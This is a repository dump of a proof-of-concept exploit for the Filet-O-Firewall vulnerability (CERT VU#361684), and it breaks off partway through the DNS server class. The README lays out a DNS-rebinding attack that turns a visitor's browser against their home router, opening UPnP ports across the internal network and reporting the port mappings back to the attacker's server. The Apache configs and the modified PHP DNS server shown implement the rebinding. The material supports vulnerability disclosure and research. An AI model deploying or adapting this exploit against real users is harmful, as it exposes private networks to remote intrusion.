├── README.md
├── apache_ports.conf
├── apache_site.conf
├── etc
    └── phpdns
    │   ├── README.md
    │   ├── StorageProvider
    │       ├── AbstractStorageProvider.php
    │       └── JsonStorageProvider.php
    │   ├── dns_record.json
    │   ├── dns_server.class.php
    │   └── example.php
├── infoflow_new.jpg
├── php_inline.conf
├── phpdns_ubuntu_service
├── server_settings.readme
└── var
    └── www
        └── html
            ├── ajax-loader.gif
            ├── c0.html
            ├── c1.html
            ├── config.php
            ├── i0.php
            ├── open.js
            ├── p0.html
            ├── r0.php
            ├── test.html
            ├── u0.php
            ├── wmain.html
            ├── wopen.html
            └── worker.js


/README.md:
--------------------------------------------------------------------------------
 1 | # Filet-O-Firewall Vulnerability PoC
 2 | 
 3 | This is the Proof of Concept code to exploit the Filet-O-Firewall vulnerability. 
 4 | 
 5 | CERT VU#361684 http://www.kb.cert.org/vuls/id/361684
 6 | 
 7 | The code is currently being cleaned up to be more easily digestable, but it is working at the moment.
 8 | 
 9 | The best browser to use for the PoC is Firefox, it works 99% of the time.
10 | 
11 | Google Chrome recently changed some of its behavior in regards to how it handles XMLHTTPRequest timing.  Will have to do research to see how to fix this.
12 | 
13 | ## Infrastructure Setup
14 | * We need a domain that we can become the authoritative name server for.
15 | * Ideally two separate static IP addresses.
16 | * An Apache Server with the correct code.
17 | * The PHP DNS server code (or a DNS server that reads from Memcache).
18 | * A Memcache server.
19 | * We need to make sure our web server responds on all the UPnP ports (since the port needs to also be the same to bypass CORS).
20 | * When we do the DNS Multiple A Record switch (switching from our web server to the client’s gateway ip), the browser will simply switch the IP.  It does not change the path or the port.  
21 | * It is key to have the page that we send them to (open.html) load all of its resources quickly and not depend on any resources from the randomly generated subdomain.  Access to the webserver on that port will be cut off in order to force the browser to switch to the second A record we have in our DNS response.
22 | 
23 | ## DNS Server
24 | * The default DNS records need to be setup in dns_record.json.  
25 | * Test.firefox needs to be specified with the public IP of the web server and the default gateway IP you would like to use in case the Memcache server is broken or too slow to respond (for some unknown reason).
26 | * Test.sub needs to be changed to the secondary IP of the web server.  This ensures connectivity can still happen during the DNS rebind attack.
27 | * Run the DNS server by starting a screen session and running “php example.php”.
28 | 
29 | ## Apps to Install
30 | * Apache
31 | * PHP
32 | * Memcache
33 | 
34 | ## Files Guide
35 | 1. php_inline.conf
36 |    * Should go in Apache conf.d directory.
37 | 2. apache_ports.conf
38 |    * Should be used for Apache's ports.conf.
39 | 3. php_dns_ubuntu_service
40 |    * Can be used to register a service for the php dns server.
41 | 4. apache_site.conf
42 |    * Should be used as the Apache config file.
43 | 5. server_settings.readme
44 |    * Contains text that should be added to /etc/sudoers so php can modify iptables rules.
45 | 6. /etc/phpdns
46 |    * For the PHP DNS server files.
47 | 7. /var/www/html
48 |    * For the web server files.
49 | 8. Config.php
50 |    * The future home of most configurable directives
51 | 9. Wmain.html
52 |    * Displays a loading gif and scans IP addresses of the user’s gateway for possible UPnP ports that are open. If none are found 80 is assumed as the UPnP port.
53 |    * Sets whether debug mode is on or off.
54 |    * Generates random subdomain.
55 |    * Determines user’s private IP address.
56 |    * Redirects user to random subdomain and UPnP port.
57 |    * Determines the user’s browser (may be needed for extra functionality later).
58 | 10. U0.php
59 |    * Accepts the base64 encoded internal ip address of the gateway and calculates the subnet.  
60 |    * Puts the information into memcache with the subdomain as the key.
61 |    * Can be set to exploit Weak End System Model by adding the public IP of the gateway instead of the internal IP of the gateway.
62 | 11. Wopen.html
63 |    * Displays some content (usually a video).
64 |    * Loads worker.js.
65 | 12. C1.html
66 |    * Accepts port in POST parameters and adds iptables rule blocking the port on the webserver to the IP address who made the request.
67 | 13. C0.html
68 |    * Accepts port in POST parameters and removes iptables rule blocking the port on the webserver to the IP address who made the request.
69 | 14. I0.php
70 |    * Returns the gateway and subnet for the requested subdomain.
71 | 15. R0.php
72 |    * -Accepts POSTed information and stores it in a file in the testup directory.
73 | 16. Worker.js
74 |    * POSTs the port being actively used to C1.HTML (which will add the iptables rules to cut off access).
75 |    * Starts requesting possible XML files from the gateway (the browser automatically starts using the other IP address in the multiple A record when the original cannot be accessed).
76 |    * Asks for Gateway IP from i0.php.
77 |    * Once XML is found, parses the controlURL property.
78 |    * POSTs XML to the controlURL to open all ports specified in the script (e.g. 80, 443, 445, 22, etc.) for the gateway ip address and client’s ip address starting with external port 5800.
79 |    * POSTs opened port internal to external mapping to r0.php.
80 |    * Loades open.js (web worker code) and spawns configured number of web workers.
81 |    * Breaks up subnet based on number of web workers.
82 |       * Assigns work to web workers.
83 |       * Web workers contact gateway and open rest of internal network hosts on all configured ports.
84 |    * Once finished POSTs full list of hosts and internal to external port mapping to r0.php
85 |    * POSTs port to c0.html to remove iptables rule.
86 |    * Finishes
87 | 17. Open.js
88 |    * Web worker code for opening UPnP ports
89 | 
90 | PHP DNS Server Code from: https://github.com/yswery/PHP-DNS-SERVER
91 | 


--------------------------------------------------------------------------------
/apache_ports.conf:
--------------------------------------------------------------------------------
 1 | # If you just change the port or add more ports here, you will likely also
 2 | # have to change the VirtualHost statement in
 3 | # /etc/apache2/sites-enabled/000-default.conf
 4 | 
 5 | Listen 80
 6 | Listen 1780
 7 | Listen 1900
 8 | Listen 2189
 9 | Listen 2600
10 | Listen 2869
11 | Listen 2555
12 | Listen 5555
13 | Listen 37215
14 | Listen 47128
15 | Listen 49000
16 | Listen 49152
17 | Listen 49153
18 | Listen 56688
19 | 
20 | <IfModule ssl_module>
21 |     Listen 443
22 | </IfModule>
23 | 
24 | <IfModule mod_gnutls.c>
25 |     Listen 443
26 | </IfModule>
27 | 


--------------------------------------------------------------------------------
/apache_site.conf:
--------------------------------------------------------------------------------
 1 | <VirtualHost *:*>
 2 |     # The ServerName directive sets the request scheme, hostname and port that
 3 |     # the server uses to identify itself. This is used when creating
 4 |     # redirection URLs. In the context of virtual hosts, the ServerName
 5 |     # specifies what hostname must appear in the request's Host: header to
 6 |     # match this virtual host. For the default virtual host (this file) this
 7 |     # value is not decisive as it is used as a last resort host regardless.
 8 |     # However, you must set it for any further virtual host explicitly.
 9 |     #ServerName www.example.com
10 | 
11 |     ServerAdmin webmaster@localhost
12 |     DocumentRoot /var/www/html
13 | 
14 |     # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
15 |     # error, crit, alert, emerg.
16 |     # It is also possible to configure the loglevel for particular
17 |     # modules, e.g.
18 |     #LogLevel info ssl:warn
19 | 
20 |     ErrorLog ${APACHE_LOG_DIR}/error.log
21 |     CustomLog ${APACHE_LOG_DIR}/access.log combined
22 | 
23 |     # For most configuration files from conf-available/, which are
24 |     # enabled or disabled at a global level, it is possible to
25 |     # include a line for only one particular virtual host. For example the
26 |     # following line enables the CGI configuration for this host only
27 |     # after it has been globally disabled with "a2disconf".
28 |     #Include conf-available/serve-cgi-bin.conf
29 |     Header set Access-Control-Allow-Origin "*"
30 |     Header set Cache-Control "no-cache, no-store, must-revalidate"
31 |     Header set Pragma "no-cache"
32 |     Header set Expires 0
33 | </VirtualHost>
34 | 


--------------------------------------------------------------------------------
/etc/phpdns/README.md:
--------------------------------------------------------------------------------
 1 | PHP DNS Server
 2 | ==============
 3 | 
 4 | This is an Authoritative DNS Server written in pure PHP.
 5 | It will listen to DNS request on the default port (Default: port 53) and give answers about any donamin that it has DNS records for.
 6 | This class can be used to give DNS responses dynamically based on your pre-existing PHP code.
 7 | 
 8 | Support Record Types
 9 | ====================
10 | 
11 | * A
12 | * NS
13 | * CNAME
14 | * SOA
15 | * PTR
16 | * MX
17 | * TXT
18 | * AAAA
19 | * OPT
20 | * AXFR
21 | * ANY
22 | 
23 | PHP Requirements
24 | ================
25 | 
26 | * `PHP 5.3+`
27 | * Needs either `sockets` or `socket_create` PHP extension loaded (which they are by default)
28 | 
29 | Example:
30 | ========
31 | Here is an example of some DNS records
32 | ```
33 | <?
34 | 
35 | require "dns_server.class.php";
36 | 
37 | // dns records
38 | $ds_records = array(
39 |     'test.com' => array(
40 |         'A' => '111.111.111.111',
41 |         'MX' => '112.112.112.112',
42 |         'NS' => 'ns1.test.com',
43 |         'TXT' => 'Some text.'
44 |     ),
45 |     'test2.com' => array(
46 |         // allow multiple records of same type
47 |         'A' => array(
48 |             '111.111.111.111',
49 |             '112.112.112.112'
50 |         )
51 |     )
52 | );
53 | 
54 | // Creating a new instance of our class
55 | $dns = new PHP_DNS_SERVER($ds_records);
56 | 
57 | // Starting our DNS server
58 | $dns->start();
59 | ```
60 | 
61 | And Here is us querying it and seeing the response
62 | ```
63 | $ dig @127.0.0.1 test.com A +short
64 | 111.111.111.111
65 | 
66 | $ dig @127.0.0.1 test.com TXT +short
67 | "Some text."
68 | 
69 | $ dig @127.0.0.1 test2.com A +short
70 | 111.111.111.111
71 | 112.112.112.112
72 | ```
73 | 
74 | 


--------------------------------------------------------------------------------
/etc/phpdns/StorageProvider/AbstractStorageProvider.php:
--------------------------------------------------------------------------------
1 | <?php
2 | namespace StorageProvider;
3 | 
4 | abstract class AbstractStorageProvider
5 | {
6 |     abstract function get_answer($question);
7 | }
8 | 
9 | ?>


--------------------------------------------------------------------------------
/etc/phpdns/StorageProvider/JsonStorageProvider.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | namespace StorageProvider;
  3 | 
  4 | 
  5 | use StorageProvider\AbstractStorageProvider;
  6 | 
  7 | class JsonStorageProvider extends AbstractStorageProvider
  8 | {
  9 |     private $dns_records;
 10 |     private $DS_TYPES = [1 => 'A', 2 => 'NS', 5 => 'CNAME', 6 => 'SOA', 12 => 'PTR', 15 => 'MX', 16 => 'TXT', 28 => 'AAAA', 41 => 'OPT', 252 => 'AXFR', 255 => 'ANY'];
 11 |     private $DS_TTL = 0;
 12 | 
 13 | 
 14 |     public function __construct($record_file, $default_ttl = 300)
 15 |     {
 16 |         $handle = fopen($record_file, "r");
 17 |         if (!$handle) {
 18 |             throw new Exception('Unable to open dns record file.');
 19 |         }
 20 | 
 21 |         $dns_json = fread($handle, filesize($record_file));
 22 |         fclose($handle);
 23 | 
 24 |         $dns_records = json_decode($dns_json, true);
 25 |         if (!$dns_records) {
 26 |             throw new Exception('Unable to parse dns record file.');
 27 |         }
 28 | 
 29 |         $this->dns_records = $dns_records;
 30 |         // Connection creation
 31 |         //$memcache = new Memcache;
 32 |         //$cacheAvailable = $memcache->connect(MEMCACHED_HOST, MEMCACHED_PORT);
 33 |     }
 34 | 
 35 |     public function get_answer($question)
 36 |     {
 37 | 
 38 |         // Connection constants
 39 |         //define('MEMCACHED_HOST', '127.0.0.1');
 40 |         //define('MEMCACHED_PORT', '11211');
 41 | 
 42 |         // Connection creation
 43 |         //$memcache = new Memcache;
 44 |         //$cacheAvailable = $memcache->connect(MEMCACHED_HOST, MEMCACHED_PORT);
 45 |         global $memcache;
 46 | 
 47 |         $answer = [];
 48 |         $domain = trim($question[0]['qname'], '.');
 49 |         $defdomain = "test.chrome";
 50 |         $defchgdomain = "test.change";
 51 |         $defmultidomain = "test.firefox";
 52 |         $defsubdomain = "test.sub";
 53 |         //$mcdomain = array(); //Memcache Variable
 54 |         $cdns = explode(".", $question[0]['qname']);
 55 |         $cdns_ct = count($cdns);
 56 |         $mcdomain = [];
 57 |         $type = $this->DS_TYPES[$question[0]['qtype']];
 58 | 
 59 | 
 60 |         //CUSTOM DNS REQUEST HANDLING
 61 |         echo $question[0]['qname'] . "\n";
 62 |         foreach ($cdns as $seg) {
 63 |             echo $seg . "\n";
 64 |         }
 65 |         if ($cdns[0] == "c0") {
 66 |             echo "Change back detected: FROM " . $cdns[1] . "." . $cdns[2] . "." . $cdns[3] . " TO " . $this->dns_records[$defdomain][$type] . "\n";
 67 |             //$re  sult=$ips["intip0.com"]['A'];
 68 |             $this->dns_records[$cdns[1] . "." . $cdns[2] . "." . $cdns[3]][$type] = $this->dns_records[$defdomain][$type];
 69 |         }
 70 |         if ($cdns[0] == "c1") {
 71 |             //$result=$ips["intip0.com"]['A'];
 72 |             echo "Change detected: FROM " . $cdns[1] . "." . $cdns[2] . "." . $cdns[3] . " TO " . $this->dns_records[$defchgdomain][$type] . "\n";
 73 |             $this->dns_records[$cdns[1] . "." . $cdns[2] . "." . $cdns[3]][$type] = $this->dns_records[$defchgdomain][$type];
 74 |         }
 75 |         if ((substr($cdns[0], 0, 1) == "f") && ($cdns_ct == 4)) {
 76 |             echo "Firefox request detected: " . $cdns[1] . "." . $cdns[2] . "." . $cdns[3] . "\n";
 77 |             //Get Memcache Entry
 78 |             $mcdomain = $memcache->get($cdns[0]);
 79 |             //Check whether memcache entry is valid.  If not, return empty array
 80 |             if (count($mcdomain) > 0) {
 81 |                 if ($mcdomain)//$mcdomain[0] != false)
 82 |                 {
 83 |                     foreach ($mcdomain as $data) {
 84 |                         echo "Memcache entry: " . $data;
 85 |                     }
 86 |                     //array_unshift
 87 |                     array_unshift($mcdomain, $this->dns_records[$defdomain][$type]);
 88 |                     //INCORRECT: $this->dns_records[$defdomain][$type][1] = $mcdomain;
 89 |                 } else {
 90 |                     $mcdomain = [];
 91 |                 }
 92 |             } else {
 93 |                 $mcdomain = [];
 94 |             }
 95 |             $defdomain = $defmultidomain;
 96 |             echo "Domain section count: " . count($cdns) . "\n";
 97 |             echo "Domain changed to: " . $defmultidomain . "\n";
 98 |         }
 99 |         if ($cdns_ct == 5) {
100 |             $defdomain = $defsubdomain;
101 |         }
102 |         //RETURN NORMAL QUERY
103 |         if (isset($this->dns_records[$domain]) && isset($this->dns_records[$domain][$type])) {
104 |             if (is_array($this->dns_records[$domain][$type])) {
105 |                 foreach ($this->dns_records[$domain][$type] as $ip) {
106 |                     echo 'Returning array record: ' . $ip;
107 |                     $answer[] = [
108 |                         'name' => $question[0]['qname'],
109 |                         'class' => $question[0]['qclass'],
110 |                         'ttl' => $this->DS_TTL,
111 |                         'data' => [
112 |                             'type' => $question[0]['qtype'],
113 |                             'value' => $ip
114 |                         ]
115 |                     ];
116 |                 }
117 |             } else {
118 |                 echo 'Returning record: ' . $this->dns_records[$domain][$type];
119 |                 $answer[] = [
120 |                     'name' => $question[0]['qname'],
121 |                     'class' => $question[0]['qclass'],
122 |                     'ttl' => $this->DS_TTL,
123 |                     'data' => [
124 |                         'type' => $question[0]['qtype'],
125 |                         'value' => $this->dns_records[$domain][$type]
126 |                     ]
127 |                 ];
128 |             }
129 |         } //Check with memcache
130 |         else if (($cdns_ct == 4) && (count($mcdomain) > 0)) {
131 |             if (is_array($mcdomain)) {
132 |                 foreach ($mcdomain as $ip) {
133 |                     $answer[] = [
134 |                         'name' => $question[0]['qname'],
135 |                         'class' => $question[0]['qclass'],
136 |                         'ttl' => $this->DS_TTL,
137 |                         'data' => [
138 |                             'type' => $question[0]['qtype'],
139 |                             'value' => $ip
140 |                         ]
141 |                     ];
142 |                 }
143 |             } else {
144 |                 $answer[] = [
145 |                     'name' => $question[0]['qname'], //"wpad.com",
146 |                     'class' => $question[0]['qclass'],
147 |                     'ttl' => $this->DS_TTL,
148 |                     'data' => [
149 |                         'type' => $question[0]['qtype'],
150 |                         'value' => $mcdomain //"192.168.141.144"
151 |                     ]
152 |                 ];
153 |             }
154 |         } //RETURN DEFAULT ANSWER FOR UNKOWN QUERY FOR DOMAIN
155 |         else if (isset($this->dns_records[$defdomain]) && isset($this->dns_records[$defdomain][$type])) {
156 |             if (is_array($this->dns_records[$defdomain][$type])) {
157 |                 foreach ($this->dns_records[$defdomain][$type] as $ip) {
158 |                     $answer[] = [
159 |                         'name' => $question[0]['qname'],
160 |                         'class' => $question[0]['qclass'],
161 |                         'ttl' => $this->DS_TTL,
162 |                         'data' => [
163 |                             'type' => $question[0]['qtype'],
164 |                             'value' => $ip
165 |                         ]
166 |                     ];
167 |                 }
168 |             } else {
169 |                 echo 'Returning default: ' . $this->dns_records[$defdomain][$type];
170 |                 $answer[] = [
171 |                     'name' => $question[0]['qname'], //"wpad.com",
172 |                     'class' => $question[0]['qclass'],
173 |                     'ttl' => $this->DS_TTL,
174 |                     'data' => [
175 |                         'type' => $question[0]['qtype'],
176 |                         'value' => $this->dns_records[$defdomain][$type] //"192.168.141.144"
177 |                     ]
178 |                 ];
179 |             }
180 |         }
181 | 
182 |         return $answer;
183 |     }
184 | 
185 | }
186 | 
187 | ?>


--------------------------------------------------------------------------------
/etc/phpdns/dns_record.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "test.chrome": {
 3 |     "A": "YOURPUBIP",
 4 |     "MX": "112.112.112.112",
 5 |     "NS": "YOURPUBNSRECORD",
 6 |     "TXT": "Some text.",
 7 |     "AAAA": "DEAD:01::BEEF"
 8 |   },
 9 |   "test.firefox": {
10 |     "A": [
11 |       "YOURPUBIP"
12 |     ],
13 |     "MX": "112.112.112.112"
14 |   },
15 |   "test.change": {
16 |     "A": "192.168.1.1",
17 |     "MX": "112.112.112.112",
18 |     "NS": "YOURPUBNSRECORD",
19 |     "TXT": "Some text.",
20 |     "AAAA": "DEAD:01::BEEF"
21 |   },
22 |   "test.sub": {
23 |     "A": "YOURPUBIP",
24 |     "MX": "112.112.112.112",
25 |     "NS": "YOURPUBNSRECORD",
26 |     "TXT": "Some text.",
27 |     "AAAA": "DEAD:01::BEEF"
28 |   },
29 |   "test.cname": {
30 |     "A": "192.168.141.100"
31 |   }
32 | }
33 | 


--------------------------------------------------------------------------------
/etc/phpdns/dns_server.class.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | class PHP_DNS_SERVER
  4 | {
  5 | 
  6 |     // available record types
  7 |     private $DS_TYPE_A = 1;
  8 |     private $DS_TYPE_NS = 2;
  9 |     private $DS_TYPE_CNAME = 5;
 10 |     private $DS_TYPE_SOA = 6;
 11 |     private $DS_TYPE_PTR = 12;
 12 |     private $DS_TYPE_MX = 15;
 13 |     private $DS_TYPE_TXT = 16;
 14 |     private $DS_TYPE_AAAA = 28;
 15 |     private $DS_TYPE_OPT = 41;
 16 |     private $DS_TYPE_AXFR = 252;
 17 |     private $DS_TYPE_ANY = 255;
 18 |     private $DS_TYPES = [1 => 'A', 2 => 'NS', 5 => 'CNAME', 6 => 'SOA', 12 => 'PTR', 15 => 'MX', 16 => 'TXT', 28 => 'AAAA', 41 => 'OPT', 252 => 'AXFR', 255 => 'ANY'];
 19 | 
 20 |     private $ds_storage;
 21 | 
 22 |     public function __construct($ds_storage, $bind_ip = '0.0.0.0', $bind_port = 53, $default_ttl = 300, $max_packet_len = 512)
 23 |     {
 24 |         $this->DS_PORT = $bind_port;
 25 |         $this->DS_IP = $bind_ip;
 26 |         $this->DS_TTL = $default_ttl;
 27 |         $this->DS_MAX_LENGTH = $max_packet_len;
 28 |         $this->ds_storage = $ds_storage;
 29 | 
 30 |         ini_set('display_errors', TRUE);
 31 |         ini_set('error_reporting', E_ALL);
 32 | 
 33 |         set_error_handler([$this, 'ds_error'], E_ALL);
 34 |         set_time_limit(0);
 35 | 
 36 |         if (!extension_loaded('sockets') || !function_exists('socket_create')) {
 37 |             $this->ds_error(E_USER_ERROR, 'Socket extension or function not found.', __FILE__, __LINE__);
 38 |         }
 39 |     }
 40 | 
 41 |     public function start()
 42 |     {
 43 |         $this->ds_listen();
 44 |     }
 45 | 
 46 |     private function ds_listen()
 47 |     {
 48 |         $ds_socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
 49 | 
 50 |         if (!$ds_socket) {
 51 |             $error = sprintf('Cannot create socket (socket error: %s).', socket_strerror(socket_last_error($ds_socket)));
 52 |             $this->ds_error(E_USER_ERROR, $error, __FILE__, __LINE__);
 53 |         }
 54 | 
 55 |         if (!socket_bind($ds_socket, $this->DS_IP, $this->DS_PORT)) {
 56 |             $error = sprintf('Cannot bind socket to %s:%d (socket error: %s).', $this->DS_IP, $this->DS_PORT, socket_strerror(socket_last_error($ds_socket)));
 57 |             $this->ds_error(E_USER_ERROR, $error, __FILE__, __LINE__);
 58 |         }
 59 | 
 60 |         while (TRUE) {
 61 |             $buffer = $ip = $port = NULL;
 62 | 
 63 |             if (!socket_recvfrom($ds_socket, $buffer, $this->DS_MAX_LENGTH, NULL, $ip, $port)) {
 64 |                 $error = sprintf('Cannot read from socket ip: %s, port: %d (socket error: %s).', $ip, $port, socket_strerror(socket_last_error($ds_socket)));
 65 |                 $this->ds_error(E_USER_ERROR, $error, __FILE__, __LINE__);
 66 |             } else {
 67 |                 $response = $this->ds_handle_query($buffer, $ip, $port);
 68 | 
 69 |                 if (!socket_sendto($ds_socket, $response, strlen($response), 0, $ip, $port)) {
 70 |                     $error = sprintf('Cannot send reponse to socket ip: %s, port: %d (socket error: %s).', $ip, $port, socket_strerror(socket_last_error($ds_socket)));
 71 |                 }
 72 |             }
 73 |         }
 74 |     }
 75 | 
 76 |     private function ds_handle_query($buffer, $ip, $port)
 77 |     {
 78 |         $data = unpack('npacket_id/nflags/nqdcount/nancount/nnscount/narcount', $buffer);
 79 |         $flags = $this->ds_decode_flags($data['flags']);
 80 |         $offset = 12;
 81 | 
 82 |         $question = $this->ds_decode_question_rr($buffer, $offset, $data['qdcount']);
 83 |         $answer = $this->ds_decode_rr($buffer, $offset, $data['ancount']);
 84 |         $authority = $this->ds_decode_rr($buffer, $offset, $data['nscount']);
 85 |         $additional = $this->ds_decode_rr($buffer, $offset, $data['arcount']);
 86 |         $answer = $this->ds_storage->get_answer($question);
 87 |         $flags['qr'] = 1;
 88 |         $flags['ra'] = 0;
 89 | 
 90 |         $qdcount = count($question);
 91 |         $ancount = count($answer);
 92 |         $nscount = count($authority);
 93 |         $arcount = count($additional);
 94 | 
 95 |         $response = pack('nnnnnn', $data['packet_id'], $this->ds_encode_flags($flags), $qdcount, $ancount, $nscount, $arcount);
 96 |         $response .= ($p = $this->ds_encode_question_rr($question, strlen($response)));
 97 |         $response .= ($p = $this->ds_encode_rr($answer, strlen($response)));
 98 |         $response .= $this->ds_encode_rr($authority, strlen($response));
 99 |         $response .= $this->ds_encode_rr($additional, strlen($response));
100 | 
101 |         return $response;
102 |     }
103 | 
104 | 
105 |     private function ds_decode_flags($flags)
106 |     {
107 |         $res = [];
108 | 
109 |         $res['qr'] = $flags >> 15 & 0x1;
110 |         $res['opcode'] = $flags >> 11 & 0xf;
111 |         $res['aa'] = $flags >> 10 & 0x1;
112 |         $res['tc'] = $flags >> 9 & 0x1;
113 |         $res['rd'] = $flags >> 8 & 0x1;
114 |         $res['ra'] = $flags >> 7 & 0x1;
115 |         $res['z'] = $flags >> 4 & 0x7;
116 |         $res['rcode'] = $flags & 0xf;
117 | 
118 |         return $res;
119 |     }
120 | 
121 |     private function ds_decode_question_rr($pkt, &$offset, $count)
122 |     {
123 |         $res = [];
124 | 
125 |         for ($i = 0; $i < $count; ++$i) {
126 |             if ($offset > strlen($pkt)) return false;
127 |             $qname = $this->ds_decode_label($pkt, $offset);
128 |             $tmp = unpack('nqtype/nqclass', substr($pkt, $offset, 4));
129 |             $offset += 4;
130 |             $tmp['qname'] = $qname;
131 |             $res[] = $tmp;
132 |         }
133 |         return $res;
134 |     }
135 | 
136 |     private function ds_decode_label($pkt, &$offset)
137 |     {
138 |         $end_offset = NULL;
139 |         $qname = '';
140 | 
141 |         while (1) {
142 |             $len = ord($pkt[$offset]);
143 |             $type = $len >> 6 & 0x2;
144 | 
145 |             if ($type) {
146 |                 switch ($type) {
147 |                     case 0x2:
148 |                         $new_offset = unpack('noffset', substr($pkt, $offset, 2));
149 |                         $end_offset = $offset + 2;
150 |                         $offset = $new_offset['offset'] & 0x3fff;
151 |                         break;
152 |                     case 0x1:
153 |                         break;
154 |                 }
155 |                 continue;
156 |             }
157 | 
158 |             if ($len > (strlen($pkt) - $offset))
159 |                 return NULL;
160 | 
161 |             if ($len == 0) {
162 |                 if ($qname == '')
163 |                     $qname = '.';
164 |                 ++$offset;
165 |                 break;
166 |             }
167 |             $qname .= substr($pkt, $offset + 1, $len) . '.';
168 |             $offset += $len + 1;
169 |         }
170 | 
171 |         if (!is_null($end_offset)) {
172 |             $offset = $end_offset;
173 |         }
174 | 
175 |         return $qname;
176 |     }
177 | 
178 |     private function ds_decode_rr($pkt, &$offset, $count)
179 |     {
180 |         $res = [];
181 | 
182 |         for ($i = 0; $i < $count; ++$i) {
183 |             // read qname
184 |             $qname = $this->ds_decode_label($pkt, $offset);
185 |             // read qtype & qclass
186 |             $tmp = unpack('ntype/nclass/Nttl/ndlength', substr($pkt, $offset, 10));
187 |             $tmp['name'] = $qname;
188 |             $offset += 10;
189 |             $tmp['data'] = $this->ds_decode_type($tmp['type'], substr($pkt, $offset, $tmp['dlength']));
190 |             $offset += $tmp['dlength'];
191 |             $res[] = $tmp;
192 |         }
193 | 
194 |         return $res;
195 |     }
196 | 
197 |     private function ds_decode_type($type, $val)
198 |     {
199 |         $data = [];
200 | 
201 |         switch ($type) {
202 |             case $this->DS_TYPE_A:
203 |                 $data['value'] = inet_ntop($val);
204 |                 break;
205 |             case $this->DS_TYPE_AAAA:
206 |                 $data['value'] = inet_ntop($val);
207 |                 break;
208 |             case $this->DS_TYPE_NS:
209 |                 $foo_offset = 0;
210 |                 $data['value'] = $this->ds_decode_label($val, $foo_offset);
211 |                 break;
212 |             case $this->DS_TYPE_CNAME:
213 |                 $foo_offset = 0;
214 |                 $data['value'] = $this->ds_decode_label($val, $foo_offset);
215 |                 break;
216 |             case $this->DS_TYPE_SOA:
217 |                 $data['value'] = [];
218 |                 $offset = 0;
219 |                 $data['value']['mname'] = $this->ds_decode_label($val, $offset);
220 |                 $data['value']['rname'] = $this->ds_decode_label($val, $offset);
221 |                 $next_values = unpack('Nserial/Nrefresh/Nretry/Nexpire/Nminimum', substr($val, $offset));
222 | 
223 |                 foreach ($next_values as $var => $val) {
224 |                     $data['value'][$var] = $val;
225 |                 }
226 | 
227 |                 break;
228 |             case $this->DS_TYPE_PTR:
229 |                 $foo_offset = 0;
230 |                 $data['value'] = $this->ds_decode_label($val, $foo_offset);
231 |                 break;
232 |             case $this->DS_TYPE_MX:
233 |                 $tmp = unpack('n', $val);
234 |                 $data['value'] = [
235 |                     'priority' => $tmp[0],
236 |                     'host' => substr($val, 2),
237 |                 ];
238 |                 break;
239 |             case $this->DS_TYPE_TXT:
240 |                 $len = ord($val[0]);
241 | 
242 |                 if ((strlen($val) + 1) < $len) {
243 |                     $data['value'] = NULL;
244 |                     break;
245 |                 }
246 | 
247 |                 $data['value'] = substr($val, 1, $len);
248 |                 break;
249 |             case $this->DS_TYPE_AXFR:
250 |                 $data['value'] = NULL;
251 |                 break;
252 |             case $this->DS_TYPE_ANY:
253 |                 $data['value'] = NULL;
254 |                 break;
255 |             case $this->DS_TYPE_OPT:
256 |                 $data['type'] = $this->DS_TYPE_OPT;
257 |                 $data['value'] = [
258 |                     'type' => $this->DS_TYPE_OPT,
259 |                     'ext_code' => $this->DS_TTL >> 24 & 0xff,
260 |                     'udp_payload_size' => 4096,
261 |                     'version' => $this->DS_TTL >> 16 & 0xff,
262 |                     'flags' => $this->ds_decode_flags($this->DS_TTL & 0xffff)
263 |                 ];
264 |                 break;
265 |             default:
266 |                 $data['value'] = $val;
267 |                 return false;
268 |         }
269 | 
270 |         return $data;
271 |     }
272 | 
273 |     private function ds_encode_flags($flags)
274 |     {
275 |         $val = 0;
276 | 
277 |         $val |= ($flags['qr'] & 0x1) << 15;
278 |         $val |= ($flags['opcode'] & 0xf) << 11;
279 |         $val |= ($flags['aa'] & 0x1) << 10;
280 |         $val |= ($flags['tc'] & 0x1) << 9;
281 |         $val |= ($flags['rd'] & 0x1) << 8;
282 |         $val |= ($flags['ra'] & 0x1) << 7;
283 |         $val |= ($flags['z'] & 0x7) << 4;
284 |         $val |= ($flags['rcode'] & 0xf);
285 | 
286 |         return $val;
287 |     }
288 | 
289 |     private function ds_encode_label($str, $offset = NULL)
290 |     {
291 |         $res = '';
292 |         $in_offset = 0;
293 | 
294 |         if ($str == '.') {
295 |             return "\0";
296 |         }
297 | 
298 |         while (1) {
299 |             $pos = strpos($str, '.', $in_offset);
300 | 
301 |             if ($pos === false) {
302 |                 return $res . "\0";
303 |             }
304 | 
305 |             $res .= chr($pos - $in_offset) . substr($str, $in_offset, $pos - $in_offset);
306 |             $offset += ($pos - $in_offset) + 1;
307 |             $in_offset = $pos + 1;
308 |         }
309 |     }
310 | 
311 |     private function ds_encode_question_rr($list, $offset)
312 |     {
313 |         $res = '';
314 | 
315 |         foreach ($list as $rr) {
316 |             $lbl = $this->ds_encode_label($rr['qname'], $offset);
317 |             $offset += strlen($lbl) + 4;
318 |             $res .= $lbl;
319 |             $res .= pack('nn', $rr['qtype'], $rr['qclass']);
320 |         }
321 | 
322 |         return $res;
323 |     }
324 | 
325 |     private function ds_encode_rr($list, $offset)
326 |     {
327 |         $res = '';
328 | 
329 |         foreach ($list as $rr) {
330 |             $lbl = $this->ds_encode_label($rr['name'], $offset);
331 |             $res .= $lbl;
332 |             $offset += strlen($lbl);
333 | 
334 |             if (!is_array($rr['data'])) {
335 |                 return false;
336 |             }
337 | 
338 |             $offset += 10;
339 |             $data = $this->ds_encode_type($rr['data']['type'], $rr['data']['value'], $offset);
340 | 
341 |             if (is_array($data)) {
342 |                 // overloading written data
343 |                 if (!isset($data['type']))
344 |                     $data['type'] = $rr['data']['type'];
345 |                 if (!isset($data['data']))
346 |                     $data['data'] = '';
347 |                 if (!isset($data['class']))
348 |                     $data['class'] = $rr['class'];
349 |                 if (!isset($data['ttl']))
350 |                     $data['ttl'] = $rr['ttl'];
351 |                 $offset += strlen($data['data']);
352 |                 $res .= pack('nnNn', $data['type'], $data['class'], $data['ttl'], strlen($data['data'])) . $data['data'];
353 |             } else {
354 |                 $offset += strlen($data);
355 |                 $res .= pack('nnNn', $rr['data']['type'], $rr['class'], $rr['ttl'], strlen($data)) . $data;
356 |             }
357 |         }
358 | 
